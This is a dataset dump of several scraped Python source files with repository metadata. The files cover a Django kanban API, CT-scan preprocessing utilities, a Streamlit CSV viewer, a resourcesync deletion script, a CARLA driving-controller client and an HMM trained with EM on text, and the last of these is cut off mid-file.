repo_name
stringlengths 7
111
| __id__
int64 16.6k
19,705B
| blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 5
151
| content_id
stringlengths 40
40
| detected_licenses
list | license_type
stringclasses 2
values | repo_url
stringlengths 26
130
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringlengths 4
42
| visit_date
timestamp[ns] | revision_date
timestamp[ns] | committer_date
timestamp[ns] | github_id
int64 14.6k
687M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 12
values | gha_fork
bool 2
classes | gha_event_created_at
timestamp[ns] | gha_created_at
timestamp[ns] | gha_updated_at
timestamp[ns] | gha_pushed_at
timestamp[ns] | gha_size
int64 0
10.2M
⌀ | gha_stargazers_count
int32 0
178k
⌀ | gha_forks_count
int32 0
88.9k
⌀ | gha_open_issues_count
int32 0
2.72k
⌀ | gha_language
stringlengths 1
16
⌀ | gha_archived
bool 1
class | gha_disabled
bool 1
class | content
stringlengths 10
2.95M
| src_encoding
stringclasses 5
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 10
2.95M
| extension
stringclasses 19
values | num_repo_files
int64 1
202k
| filename
stringlengths 4
112
| num_lang_files
int64 1
202k
| alphanum_fraction
float64 0.26
0.89
| alpha_fraction
float64 0.2
0.89
| hex_fraction
float64 0
0.09
| num_lines
int32 1
93.6k
| avg_line_length
float64 4.57
103
| max_line_length
int64 7
931
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
conleydg/kanban-django | 6,201,932,810,431 | ae73a922817dc4e3684e3ae3b1712b5456f621c3 | 8c1a4b848a4262da55b9ae7290bbd4f76acfca99 | /tasks/views.py | 160e0ab4bdcc710fccbeb0d89c050fe2feee152f | []
| no_license | https://github.com/conleydg/kanban-django | f96ac69c343723e0730d303ab08e959304d4a0cc | 40cf1f27ae7df894fa0652c232be52b2c37669f4 | refs/heads/master | 2016-09-12T09:32:35.842397 | 2016-05-17T00:17:27 | 2016-05-17T00:17:27 | 58,590,809 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from django.contrib.auth.models import User, Group
from rest_framework import viewsets, permissions
from .models import Task
from .serializers import TaskSerializer, UserSerializer, GroupSerializer
from django.contrib.auth.decorators import login_required
from django.contrib.auth.models import Permission, User
from django.shortcuts import render
def index(request):
return render(request, 'tasks/index.html')
class TaskViewSet(viewsets.ModelViewSet):
# queryset = Task.objects.all().order_by('priority')
serializer_class = TaskSerializer
def get_queryset(self):
user = self.request.user
qs = Task.objects.filter(auth_u_id=user.id)
return qs.order_by('priority')
# return Task.objects.all().order_by('priority')
# return self.request.user.task.all()
# user = self.request.user
# return Task.objects.filter(auth_u_id=user.auth_u_id)
# permission_classes = (permissions.IsAuthenticated)
def perform_create(self, serializer):
serializer.save(auth_u=self.request.user)
# def users_task(self):
# queryset = Task.object.all()
# # return
class UserViewSet(viewsets.ModelViewSet):
queryset = User.objects.all().order_by('-date_joined')
serializer_class = UserSerializer
class GroupViewSet(viewsets.ModelViewSet):
queryset = Group.objects.all()
serializer_class = GroupSerializer
| UTF-8 | Python | false | false | 1,409 | py | 7 | views.py | 6 | 0.713272 | 0.713272 | 0 | 45 | 30.311111 | 72 |
DanielRJohansen/DumbLesion | 14,834,817,073,761 | ae25db9e1bf3d5a470c70c209e84494757eec43c | 26d6af68056ef62dbf8e543d5b073f51d0ef2050 | /Toolbox.py | 26e63514e4685fecb33b6847c7548cadd5809316 | []
| no_license | https://github.com/DanielRJohansen/DumbLesion | c7992249aba1c6e26767bf7530564584e72c7e51 | 2cb2007e215f593ad216d1d36055328ede8eabec | refs/heads/master | 2022-11-24T23:29:55.279664 | 2020-07-26T13:09:58 | 2020-07-26T13:09:58 | 272,507,533 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from glob import glob
import os
import torch
import cv2
import numpy as np
import csv
import Constants
def get_subs(folder):
return glob(folder + r"\*")
def min_images(folder):
fewest = 9999
bins = [0]*1000
for sf in get_subs(folder):
num_images = len(get_subs(sf))
bins[num_images] += 1
if num_images < fewest:
fewest = num_images
print(sf, fewest)
print("Fewest images in all folders:", fewest)
print(bins)
def delete_files(folder, f_format=".csv", suffix_len=4):
print("Removing {} files from {}".format(f_format, folder))
for sf in get_subs(folder):
for file in get_subs(sf):
if file[-suffix_len:] == f_format:
os.remove(file)
def save_tensor(tensor, file_name):
torch.save(tensor, file_name + ".pt")
def highest_lowest(path):
im = torch.load(path)
print(path)
print("Lowest: ", torch.min(im))
print("Highest ", torch.max(im))
def getFolderAndCenter(string):
i = len(string)-1
while True:
if string[i] == '_':
break
i -= 1
folder = string[:i]
center = string[i+1:]
return folder, center
def makeSectionList(folder, center):
ims = get_subs(folder)
i = 0
while i < len(ims):
if ims[i] == center:
break
i += 1
section = ims[i-3:i+4]
return section
from matplotlib import pyplot as plt
def loadSection(section_paths, im_size):
section = []
for path in section_paths:
im = cv2.imread(path, cv2.CV_16U)
im = cv2.resize(im, (im_size, im_size), interpolation=cv2.INTER_CUBIC)
section.append(np.asarray(im))
section = torch.tensor(section, dtype=torch.float32)
section = section.type(torch.float32)
section = torch.sub(section, 32768)
im = section.numpy()
hist, bins = np.histogram(im.ravel(), 400, [-1000, 3000]) # Use hist
return section, hist
def saveSectionAndHist(section, hist, folder, name):
name = name[:-4]
name = os.path.join(folder, name)
if not os.path.isdir(folder):
os.makedirs(folder)
hist = torch.tensor(hist, dtype=torch.float32)
torch.save(section, name + "_section.pt")
torch.save(hist, name + "_hist.pt")
def makeAOC(src, dst, data_file, im_size):
with open(data_file) as csv_file:
csv_reader = csv.reader(csv_file, delimiter=',')
count = 0
for row in csv_reader:
if count == 0:
count += 1
continue
sf, center = getFolderAndCenter(row[0])
print(sf)
sf_path = os.path.join(src, sf)
center_path = os.path.join(src, sf, center)
dst_path = os.path.join(dst, sf)
section = makeSectionList(sf_path, center_path)
if len(section) != 7:
continue
section, hist = loadSection(section, im_size=im_size)
saveSectionAndHist(section, hist, dst_path, center)
import ast
def toList(string):
list = ast.literal_eval(string)
return list
def drawBB(im_path, AOC_label):
pass
def getRelativeBoxPosition(row, num_areas):
box = toList(row[6])
size = toList(row[13])[0]
box = np.multiply(box, num_areas/size)
box = np.round(box)
return box
def makeAOCLabel(box, num_areas):
label = np.zeros((num_areas, num_areas), dtype=np.float32)
for y in range(num_areas):
for x in range(num_areas):
if y >= box[1] and y <= box[3] and x >= box[0] and x <= box[2]:
label[y][x] = 1
return torch.tensor(label)
def makeAOCLabels(dst, data_file, num_areas):
with open(data_file) as csv_file:
csv_reader = csv.reader(csv_file, delimiter=',')
count = 0
for row in csv_reader:
if count == 0:
count += 1
continue
sf, center = getFolderAndCenter(row[0])
print(sf)
if elementExists(dst, sf, center[:-4]):
box = getRelativeBoxPosition(row, num_areas)
label = makeAOCLabel(box, num_areas)
name = os.path.join(dst, sf, center[:-4])
torch.save(label, name + "_AOCLabel.pt")
def cleanElement(string):
index = 0
while index < len(string):
if string[index] == '_':
break
index += 1
return string[:index]
def elementExists(f, sf, name):
if not os.path.isdir(os.path.join(f, sf)):
return False
elemsinfolder = os.listdir(os.path.join(f, sf))
elemsinfolder = list(set(list(map(cleanElement, elemsinfolder)))) # Stackoverflow, obviously..
for e in elemsinfolder:
if name == e:
return True
return False
def makeZLabels(dst, data_file):
with open(data_file) as csv_file:
csv_reader = csv.reader(csv_file, delimiter=',')
count = 0
for row in csv_reader:
if count == 0:
count += 1
continue
sf, center = getFolderAndCenter(row[0])
print(sf)
name = center[:-4]
path = os.path.join(dst, sf, name)
if elementExists(dst, sf, name):
z = torch.tensor(toList(row[8])[2], dtype=torch.float32)
torch.save(z, path + "_zlabel.pt")
def visualizeLabel(im_path, label_path):
label = torch.load(label_path)
im = cv2.imread(im_path, cv2.CV_16U)
print(im.shape)
label = torch.add(label, 1)
label = torch.div(label, 2).numpy()
#label = label.astype(np.uint16)
label = cv2.resize(label, (512, 512))
im = cv2.normalize(im, None, alpha=0, beta=1, norm_type=cv2.NORM_MINMAX, dtype=cv2.CV_32F)
im = cv2.multiply(im, label)
cv2.imshow("result", im)
cv2.waitKey()
def visualizePrediction(inputs, predictions):
for i in range(Constants.section_depth):
print(predictions[i])
input = inputs[i][0][3].numpy()
prediction = predictions[i]
input = cv2.resize(input, (512, 512))
input = cv2.normalize(input, None, alpha=0, beta=1, norm_type=cv2.NORM_MINMAX, dtype=cv2.CV_32F)
prediction = torch.add(prediction, 1.)
prediction = torch.div(prediction, 3.).cpu().detach().numpy()
prediction = cv2.resize(prediction, (512, 512))
im = cv2.multiply(input, prediction)
cv2.imshow("Prediction", im)
cv2.waitKey()
def printJpegs(): #No need, all is png :)
for sf in get_subs(r"D:\DumbLesion\NIH_scans\Images_png"):
for im in get_subs(sf):
if im[-3:] != "png":
print(im) | UTF-8 | Python | false | false | 6,626 | py | 14 | Toolbox.py | 13 | 0.57712 | 0.556746 | 0 | 228 | 28.065789 | 104 |
BIGKINGS10/demos | 3,659,312,141,879 | 5f357a8c0700d350c7afc723fa8e52c66258ce93 | 725c9ea87a1561daa00c104cdc056fc92cdaba18 | /DataAnalyticsRobot.py | 60bc29513192926c7efdee018cc76ee74671dcc7 | []
| no_license | https://github.com/BIGKINGS10/demos | 4f888d2b386a28d3968585a0e992257e3b82e49f | cadaa51cfc7ae2789fa9707843c82817d0883a1c | refs/heads/main | 2023-04-08T21:46:03.198388 | 2021-04-02T17:28:38 | 2021-04-02T17:28:38 | 343,210,180 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import streamlit as st
#import plotly_express as px
import pandas as pd
import numpy as np
#title of the app
st.title("Data Analytics Robot")
#Add a sidebar
st.sidebar.subheader("Visualization Settings")
#setup file upload
uploaded_file = st.sidebar.file_uploader(label="Upload your CSV or Excel File.", type=['csv','xlsx'])
global df
if uploaded_file is not None:
print(uploaded_file)
print("hello")
try:
df = pd.read_csv(uploaded_file)
except Exception as e:
print(e)
df = pd.read_excel(uploaded_file)
try:
st.write(df)
col= list(df.columns.values)
#col= list(df.select_dtypes.('number').columns)
option = st.sidebar.selectbox("Choose a field",(col))
#st.header(option)
#st.write(df.isnull().sum())
st.write(df[col].corr())
if st.sidebar.checkbox('Show dataframe'):
st.write("This is for testing the checkbox")
except Exception as e:
print(e)
st.write("Please upload file to the application.")
| UTF-8 | Python | false | false | 947 | py | 1 | DataAnalyticsRobot.py | 1 | 0.703273 | 0.703273 | 0 | 45 | 20 | 101 |
dhenry314/gleanomatic | 16,286,515,999,371 | 2453a71d7b6256da31f11cab0ca199f1200478ef | 3fb61cb2da8cad71b214a7faadffc27bcd1a5315 | /gleanomatic/scripts/deleteByNamespace.py | cb4e4edfabe204bb7ab67933c48726b32d43db76 | []
| no_license | https://github.com/dhenry314/gleanomatic | 4ed0ed80836e4aa622392ec804e6ca2a95336a7b | 9c9c8ab9a6da83d4a1fc429289c7450bf606005b | refs/heads/master | 2021-07-06T02:55:43.571032 | 2019-04-15T18:21:12 | 2019-04-15T18:21:12 | 148,791,398 | 0 | 1 | null | false | 2018-10-04T21:35:10 | 2018-09-14T13:19:57 | 2018-10-04T19:40:00 | 2018-10-04T21:35:10 | 40 | 0 | 1 | 0 | Python | false | null | import sys
import json
from datetime import datetime
from gleanomatic import Utils
import gleanomatic.gleanomaticLogger as gl
from gleanomatic.RSRestClient import RSRestClient
if len(sys.argv) < 2:
print("USAGE: deleteByNamespace.py {sourceNamespace}/{setNamespace}\n")
exit()
localhost = "http://localhost:81/"
argParts = sys.argv[1].split("/")
sourceNamespace = argParts[0]
setNamespace = argParts[1]
now = datetime.now()
batchTag = str(now.year)+str(now.month).zfill(2)+str(now.day).zfill(2)+ "_deletion"
logger = gl.gleanomaticLogger(sourceNamespace,setNamespace,batchTag)
rc = RSRestClient('http://resourcesync',logger)
ResURL = 'http://resourcesync/RS/' + str(sourceNamespace) + "/" + str(setNamespace) + "/resourcelistindex.json"
ResListContents = Utils.getContent(ResURL)
resList = json.loads(ResListContents)
for res in resList['sitemapindex']['sitemap']:
if 'rs:ln' in res:
if '@type' in res['rs:ln']:
if str(res['rs:ln']['@type']).lower() == 'application/json':
subResListURL = res['rs:ln']['@href']
subResListURL = subResListURL.replace(localhost,'http://resourcesync/')
#DEBUG
print(subResListURL)
subResContents = Utils.getContent(subResListURL)
subResList = json.loads(subResContents)
for url in subResList['urlset']['url']:
if 'rs:ln' in url:
if '/resource/' in url['rs:ln']['href']:
resPath = url['rs:ln']['href']
uri = 'http://resourcesync' + str(resPath)
rc.deleteResource(uri)
print("deleted: " + str(uri))
| UTF-8 | Python | false | false | 1,744 | py | 46 | deleteByNamespace.py | 38 | 0.603211 | 0.598624 | 0 | 46 | 36.913043 | 111 |
zwc662/CARLA | 11,381,663,353,526 | e6b4acaee539ede53d6f19d4f04586718b3071f0 | 3178c199a3a6f5805fc45c8791204259bcb39125 | /PythonAPI/synchronous_mode/synchronous_mode_client_control.py | ae9abb39fe68210649993c9cbc145dd7b6b9a213 | []
| no_license | https://github.com/zwc662/CARLA | e3550d6fa2b07036c69d10a9f1642cc975ce5e2e | ec32181c67417c56d93d3d7afd22946c50e78a6c | refs/heads/master | 2021-07-21T14:12:52.241222 | 2020-08-21T01:20:37 | 2020-08-21T01:20:37 | 207,066,345 | 1 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!/usr/bin/env python
# Copyright (c) 2019 Computer Vision Center (CVC) at the Universitat Autonoma de
# Barcelona (UAB).
#
# This work is licensed under the terms of the MIT license.
# For a copy, see <https://opensource.org/licenses/MIT>.
import glob
import os
import sys
import pickle
try:
sys.path.append(glob.glob('../carla/dist/carla-*%d.%d-%s.egg' % (
sys.version_info.major,
sys.version_info.minor,
'win-amd64' if os.name == 'nt' else 'linux-x86_64'))[0])
except IndexError:
pass
import carla
import random
try:
import pygame
except ImportError:
raise RuntimeError('cannot import pygame, make sure pygame package is installed')
try:
import numpy as np
except ImportError:
raise RuntimeError('cannot import numpy, make sure numpy package is installed')
try:
import queue
except ImportError:
import Queue as queue
#sys.path.insert(0,'/home/ruihan/UnrealEngine_4.22/carla/Dist/CARLA_0.9.5-428-g0ce908db/LinuxNoEditor/PythonAPI/carla')
# print(sys.path)
from model_predicative_control_new import MPCController
from agents.navigation.my_basic_agent import BasicAgent
from ilqr.ilqr import ILQRController
from synchronous_mode_client_control_test_NN import spawn_trolley
class CarlaSyncMode(object):
"""
Context manager to synchronize output from different sensors. Synchronous
mode is enabled as long as we are inside this context
with CarlaSyncMode(world, sensors) as sync_mode:
while True:
data = sync_mode.tick(timeout=1.0)
"""
def __init__(self, world, *sensors, **kwargs):
self.world = world
self.sensors = sensors
self.frame = None
self.delta_seconds = 1.0 / kwargs.get('fps', 20)
self._queues = []
self._settings = None
def __enter__(self):
self._settings = self.world.get_settings()
self.frame = self.world.apply_settings(carla.WorldSettings(
no_rendering_mode=False,
synchronous_mode=True,
fixed_delta_seconds=self.delta_seconds))
def make_queue(register_event):
q = queue.Queue()
register_event(q.put)
self._queues.append(q)
make_queue(self.world.on_tick)
for sensor in self.sensors:
make_queue(sensor.listen)
return self
def tick(self, timeout, vehicle=None, control=None):
self.frame = self.world.tick()
data = [self._retrieve_data(q, timeout, vehicle, control) for q in self._queues]
assert all(x.frame == self.frame for x in data)
return data
def __exit__(self, *args, **kwargs):
self.world.apply_settings(self._settings)
def _retrieve_data(self, sensor_queue, timeout, vehicle=None, control=None):
# counter = 0
while True:
data = sensor_queue.get(timeout=timeout)
# if vehicle is not None:
# print(counter, "control", control.throttle, control.steer)
# vehicle.apply_control(control)
# counter += 1
if data.frame == self.frame:
return data
def draw_image(surface, image, blend=False):
array = np.frombuffer(image.raw_data, dtype=np.dtype("uint8"))
array = np.reshape(array, (image.height, image.width, 4))
array = array[:, :, :3]
array = array[:, :, ::-1]
image_surface = pygame.surfarray.make_surface(array.swapaxes(0, 1))
if blend:
image_surface.set_alpha(100)
surface.blit(image_surface, (0, 0))
def get_font():
fonts = [x for x in pygame.font.get_fonts()]
default_font = 'ubuntumono'
font = default_font if default_font in fonts else fonts[0]
font = pygame.font.match_font(font)
return pygame.font.Font(font, 14)
def should_quit():
for event in pygame.event.get():
if event.type == pygame.QUIT:
return True
elif event.type == pygame.KEYUP:
if event.key == pygame.K_ESCAPE:
return True
return False
# =================================
# RH: customized methods
# ===============================
class AttrDict(dict):
def __init__(self, *args, **kwargs):
super(AttrDict, self).__init__(*args, **kwargs)
self.__dict__ = self
def get_mpc_control(world, vehicle, m, controller, actor_list, blueprint_library):
# TODO: add more params in the dict,
# which can be automatically converted (to replace args)
params_dict = {'target_speed': 10}
params = AttrDict(params_dict)
# get current "measurements"
t = vehicle.get_transform()
v = vehicle.get_velocity()
c = vehicle.get_control()
measurements_dict = {"v": v,
"t": t} # TODO: create a dict that return the world&vehicle data similar as 0.8 API
measurements = AttrDict(measurements_dict)
cur_wp = m.get_waypoint(t.location)
local_interval = 0.5
horizon = 30
# initiate a series of waypoints
future_wps = []
future_wps.append(cur_wp)
for i in range(horizon):
# TODO: check whether "next" works here
future_wps.append(random.choice(future_wps[-1].next(local_interval)))
# # save data for testing
# print("future_wps")
# print(future_wps)
# print("measurements")
# print(measurements)
# data = []
# for waypoint in future_wps:
# data.append({"waypoint": transform_to_arr(waypoint.transform)})
# actor_list.append(spawn_trolley(world, blueprint_library, x=waypoint.transform.location.x, y=waypoint.transform.location.y))
# print("transform")
# data.append({"measurements.t": transform_to_arr(measurements.t)})
# print(transform_to_arr(measurements.t))
# print("velocity")
# data.append({"measurements.v": np.array([measurements.v.x, measurements.v.y, measurements.v.z])})
# print(np.array([measurements.v.x, measurements.v.y, measurements.v.z]))
# print("full data")
# print(data)
# for MPCController
# one_log_dict = controller.control(future_wps, measurements)
# for ILQRController
# Build target waypoints array
future_wps_np = []
for waypoint in list(future_wps)[:controller.steps_ahead]:
future_wps_np.append(transform_to_arr(waypoint.transform)[0:2])
future_wps_np = np.array(future_wps_np)
xs, us = controller.control(future_wps_np, measurements)
# print("one_log_dict in run_carla_client")x
# print(one_log_dict)
control = carla.VehicleControl()
# control.throttle, control.steer = one_log_dict['throttle'], one_log_dict['steer']
control.throttle, control.steer = us[0][0], us[0][1]
return control
def reach_destiny(destiny_loc, vehicle):
veh_loc = vehicle.get_transform().location
dist_vec = np.array([destiny_loc.x-veh_loc.x, destiny_loc.y-veh_loc.y])
print("dist", dist_vec, np.linalg.norm(dist_vec))
return np.linalg.norm(dist_vec)
def transform_to_arr(tf):
return np.array([tf.location.x, tf.location.y, tf.location.z, tf.rotation.pitch, tf.rotation.yaw, tf.rotation.roll])
# ===============================
# main function
# ===============================
def main():
pygame.init()
actor_list = []
display = pygame.display.set_mode(
(800, 600),
pygame.HWSURFACE | pygame.DOUBLEBUF)
font = get_font()
clock = pygame.time.Clock()
client = carla.Client('localhost', 2000)
client.set_timeout(2.0)
world = client.get_world()
# actor_list = world.get_actors() # can get actors like traffic lights, stop signs, and spectator
# set a clear weather
# weather = carla.WeatherParameters(cloudyness=0.0, precipitation=0.0, sun_altitude_angle=90.0)
# world.set_weather(weather)
world.set_weather(carla.WeatherParameters.ClearNoon)
try:
m = world.get_map()
spawn_points = m.get_spawn_points()
print("total number of spawn_points", len(spawn_points))
destiny = carla.Location(x=-2.419357, y=204.005676, z=1.843104)
start_pose = carla.Transform(location=carla.Location(x=-6.446170, y=-79.055023))
wps_file = "wps_at_plant_rotary_01.pt"
load_wps = pickle.load(open(wps_file, 'rb'))
print(load_wps)
recovered_wps = []
for wp in load_wps:
recovered_wps.append(m.get_waypoint(carla.Location(x=wp[0], y=wp[1])))
print("recovered_wps")
print(recovered_wps)
start_pose = recovered_wps[0].transform
print("start_pose", start_pose)
# start_pose = random.choice(spawn_points)
print("car start_pose", start_pose.location)
waypoint = m.get_waypoint(start_pose.location)
blueprint_library = world.get_blueprint_library()
# set a constant vehicle
vehicle_bp = random.choice(blueprint_library.filter('vehicle.lincoln.mkz2017'))
vehicle = world.spawn_actor(vehicle_bp, start_pose)
actor_list.append(vehicle)
vehicle.set_simulate_physics(True)
camera_rgb = world.spawn_actor(
blueprint_library.find('sensor.camera.rgb'),
carla.Transform(carla.Location(x=-5.5, z=2.8), carla.Rotation(pitch=-15)),
attach_to=vehicle)
actor_list.append(camera_rgb)
camera_semseg = world.spawn_actor(
blueprint_library.find('sensor.camera.semantic_segmentation'),
carla.Transform(carla.Location(x=-5.5, z=2.8), carla.Rotation(pitch=-15)),
attach_to=vehicle)
actor_list.append(camera_semseg)
vehicle_agent = BasicAgent(vehicle, target_speed=30)
destiny = spawn_points[94]
destiny_loc = destiny.location
vehicle_agent.set_destination((destiny_loc.x, destiny_loc.y, destiny_loc.z))
target_speed = 10
# controller = MPCController(target_speed)
controller = ILQRController(target_speed, steps_ahead=25)
# try to spawn a static actor at destination
# for attr in blueprint:
# if attr.is_modifiable:
# blueprint.set_attribute(attr.id, random.choice(attr.recommended_values))
# trolley_bp = random.choice(blueprint_library.filter('static.prop.shoppingtrolley')) # vehicle.toyota.prius static.prop.shoppingtrolley
# trolley_tf = carla.Transform(location=carla.Location(x=destiny_loc.x, y=destiny_loc.y, z=5))
# print("trolley_bp", trolley_bp, trolley_tf.location)
# trolley = world.spawn_actor(trolley_bp, trolley_tf)
# actor_list.append(trolley)
# trolley.set_simulate_physics(False)
# pt_loc = carla.Location(x=destiny_loc.x, y=destiny_loc.y, z=0.5)
# print("debug", world.debug)
# world.debug.draw_string(pt_loc, 'O')
# world.debug.draw_point(pt_loc, 100)
# vehicle.set_autopilot(True)
# TODO: store this as pts_2D DF
# distance = 1
# waypoints = m.generate_waypoints(distance)
# print("waypoints length", len(waypoints))
# for wp in waypoints:
# print("waypoint", wp.transform.location)
# world.debug.draw_string(wp.transform.location, 'X', draw_shadow=False,
# color=carla.Color(r=255, g=0, b=0), life_time=120.0,
# persistent_lines=True)
# Create a synchronous mode context.
with CarlaSyncMode(world, camera_rgb, camera_semseg, fps=30) as sync_mode:
while True:
if should_quit():
return
if reach_destiny(destiny_loc, vehicle)<0:
return
clock.tick(30)
# Choose the next waypoint and update the car location.
waypoint = random.choice(waypoint.next(1.5))
# vehicle.set_transform(waypoint.transform)
# TODO: instead of set_transform, pass the waypoint info to controller and use the controller output to drive the vehicle
# TODO: the semseg is useful for later perception module
# BasicAgent use PD control
# control = vehicle_agent.run_step(debug=True)
control = get_mpc_control(world, vehicle, m, controller, actor_list, blueprint_library) # put controlller outside syncmode
# control = carla.VehicleControl(throttle=1, steer=0)
print("control", control.throttle, control.steer)
vehicle.apply_control(control)
# Advance the simulation and wait for the data.
snapshot, image_rgb, image_semseg = sync_mode.tick(timeout=2.0, vehicle=vehicle, control=control)
image_semseg.convert(carla.ColorConverter.CityScapesPalette)
fps = round(1.0 / snapshot.timestamp.delta_seconds)
# Draw the display.
draw_image(display, image_rgb)
draw_image(display, image_semseg, blend=True)
display.blit(
font.render('% 5d FPS (real)' % clock.get_fps(), True, (255, 255, 255)),
(8, 10))
display.blit(
font.render('% 5d FPS (simulated)' % fps, True, (255, 255, 255)),
(8, 28))
pygame.display.flip()
# raise ValueError("stop here")
print('destroying local actors.')
for actor in actor_list:
actor.destroy()
finally:
print('destroying actors.')
for actor in actor_list:
actor.destroy()
pygame.quit()
print('done.')
if __name__ == '__main__':
try:
main()
except KeyboardInterrupt:
print('\nCancelled by user. Bye!')
| UTF-8 | Python | false | false | 13,751 | py | 331 | synchronous_mode_client_control.py | 22 | 0.610428 | 0.595593 | 0 | 385 | 34.716883 | 144 |
edublancas/pipeline | 1,666,447,328,613 | 6ba66db85ba97ce3ae4d0bfb9983e2d86d6af46c | 98a936d5372294ed892a9bf9cf98646c72af515c | /pipeline/lab/FrozenJSON.py | 4982ba1a31619c7f158f6658a42fa7939e4ac706 | [
"MIT"
]
| permissive | https://github.com/edublancas/pipeline | f6d22ad07b134be98c139d1de6ca7d8321072ba8 | 5bef04d77fdadc1dc4ec22b9b346f0a062cca1ce | refs/heads/master | 2021-05-15T01:09:50.072378 | 2016-12-29T05:45:48 | 2016-12-29T05:45:48 | 59,692,708 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from collections import Mapping, MutableSequence
import keyword
class FrozenJSON(object):
"""A read-only facade for navigating a JSON-like object
using attribute notation.
Based on FrozenJSON from 'Fluent Python'
"""
def __new__(cls, arg):
if isinstance(arg, Mapping):
return super(FrozenJSON, cls).__new__(cls)
elif isinstance(arg, MutableSequence):
return [cls(item) for item in arg]
else:
return arg
def __init__(self, mapping):
self._data = {}
for key, value in mapping.items():
if keyword.iskeyword(key):
key += '_'
self._data[key] = value
def __getattr__(self, name):
if hasattr(self._data, name):
return getattr(self._data, name)
else:
return FrozenJSON(self._data[name])
def __dir__(self):
return self._data.keys()
def __getitem__(self, key):
return self._data[key]
| UTF-8 | Python | false | false | 994 | py | 27 | FrozenJSON.py | 24 | 0.561368 | 0.561368 | 0 | 35 | 27.4 | 59 |
lexuanthien/python-django-basic | 8,306,466,766,573 | 91bdd117fc2f71cea5dff51d7ebdc8c2677b5b26 | 94cc1a151b1a6e72522407a3241647182ce1528f | /issue/serializers.py | 26ec48976b27f88ec64eb8efa6ba47d90182269f | []
| no_license | https://github.com/lexuanthien/python-django-basic | 5a155d722cd206f4bd09024ff0dea607bfff1462 | b56d4b72b8c1529679751e93b48eb846ff8e48a4 | refs/heads/master | 2023-06-11T06:10:40.946499 | 2021-06-28T08:39:06 | 2021-06-28T08:39:06 | 380,962,866 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from rest_framework import serializers
from .models import Task
class TaskSerializer(serializers.ModelSerializer):
title = serializers.CharField()
content = serializers.CharField(max_length=10)
type = serializers.IntegerField(default=1)
class Meta:
model = Task
fields = ['title', 'content', 'type', 'created_at', 'updated_at']
# class TaskSerializer(serializers.Serializer):
# title = serializers.CharField()
# content = serializers.CharField(max_length=10)
# type = serializers.IntegerField(default=1) | UTF-8 | Python | false | false | 551 | py | 17 | serializers.py | 9 | 0.713249 | 0.702359 | 0 | 17 | 31.470588 | 73 |
j-towns/ssm-code | 3,040,836,885,446 | 0fc3fb560e605fa069f23d10294c30767fb5b30a | d0772e49724cb282e8435784053cbdd6cf05ae67 | /generate_model_plot.py | c439166b2b9101e29aeecf376e884e25f247a1fb | [
"MIT"
]
| permissive | https://github.com/j-towns/ssm-code | 6bd4ad1a89483b029a6b8dd53eb1bfc816b317ef | 4255ac0f7801779e3511a8d9c64b9ee846c26e21 | refs/heads/master | 2023-03-27T10:15:37.360335 | 2021-03-19T11:13:30 | 2021-03-19T11:13:30 | 349,015,928 | 9 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # Based on examples/hmm_em.py, from the Autograd repository.
from __future__ import division, print_function
from dataclasses import replace
import autograd.numpy as np
import autograd.numpy.random as npr
from autograd.scipy.special import logsumexp
from autograd import value_and_grad as vgrad
from functools import partial
from os.path import join, dirname
import string
import craystack as cs
import hmm_codec
def EM(init_params, data, callback=None):
def EM_update(params):
natural_params = list(map(np.log, params))
# E step:
loglike, E_stats = vgrad(log_partition_function)(natural_params, data)
if callback: callback(loglike, params)
return list(map(normalize, E_stats)) # M step
def fixed_point(f, x0, max_iter=50):
x1 = f(x0)
# while different(x0, x1):
# x0, x1 = x1, f(x1)
for _ in range(max_iter):
x0, x1 = x1, f(x1)
return x1
# def different(params1, params2):
# allclose = partial(np.allclose, atol=5e-2, rtol=5e-2)
# return not all(map(allclose, params1, params2))
return fixed_point(EM_update, init_params)
def normalize(a):
def replace_zeros(a):
return np.where(a > 0., a, 1.)
return a / replace_zeros(a.sum(-1, keepdims=True))
def log_partition_function(natural_params, data):
if isinstance(data, list):
return sum(map(partial(log_partition_function, natural_params), data))
log_pi, log_A, log_B = natural_params
log_alpha = log_pi
for y in data:
log_alpha = logsumexp(log_alpha[:,None] + log_A, axis=0) + log_B[:,y]
return logsumexp(log_alpha)
def initialize_hmm_parameters(num_states, num_outputs):
init_pi = normalize(npr.rand(num_states))
init_A = normalize(npr.rand(num_states, num_states))
init_B = normalize(npr.rand(num_states, num_outputs))
return init_pi, init_A, init_B
def build_dataset(filename, max_lines=-1):
"""Loads a text file, and turns each line into an encoded sequence."""
encodings = dict(list(map(reversed, enumerate(string.printable))))
digitize = lambda char: (encodings[char]
if char in encodings else len(encodings))
encode_line = lambda line: np.array(list(map(digitize, line)))
nonblank_line = lambda line: len(line) > 2
with open(filename) as f:
lines = f.readlines()
encoded_lines = list(map(
encode_line, list(filter(nonblank_line, lines))[:max_lines]))
num_outputs = len(encodings) + 1
return encoded_lines, num_outputs
if __name__ == '__main__':
np.random.seed(0)
np.seterr(divide='ignore')
train_size, test_size, compress_size = 100, 20, 100
# callback to print log likelihoods during training
print_loglike = lambda loglike, params: print(
loglike / train_size,
log_partition_function(list(map(np.log, params)), test_inputs)
/ test_size)
# load training data
lstm_filename = join(dirname(__file__), 'war_and_peace.txt')
inputs, num_outputs = build_dataset(
lstm_filename, max_lines=train_size + test_size + compress_size)
train_inputs, test_inputs, compress_inputs = (
inputs[:train_size],
inputs[train_size:train_size + test_size],
inputs[train_size + test_size:]
)
# train with EM
num_states = 32
init_params = initialize_hmm_parameters(num_states, num_outputs)
print('Training hmm_codec with EM...')
a0, a, b = EM(init_params, train_inputs, print_loglike)
from matplotlib import pyplot as plt
from matplotlib import ticker
plt.rcParams.update({"text.usetex": True})
h = hmm_codec.HyperParams(num_states, num_outputs, T=1 << 9)
print('Hyperparameter settings:')
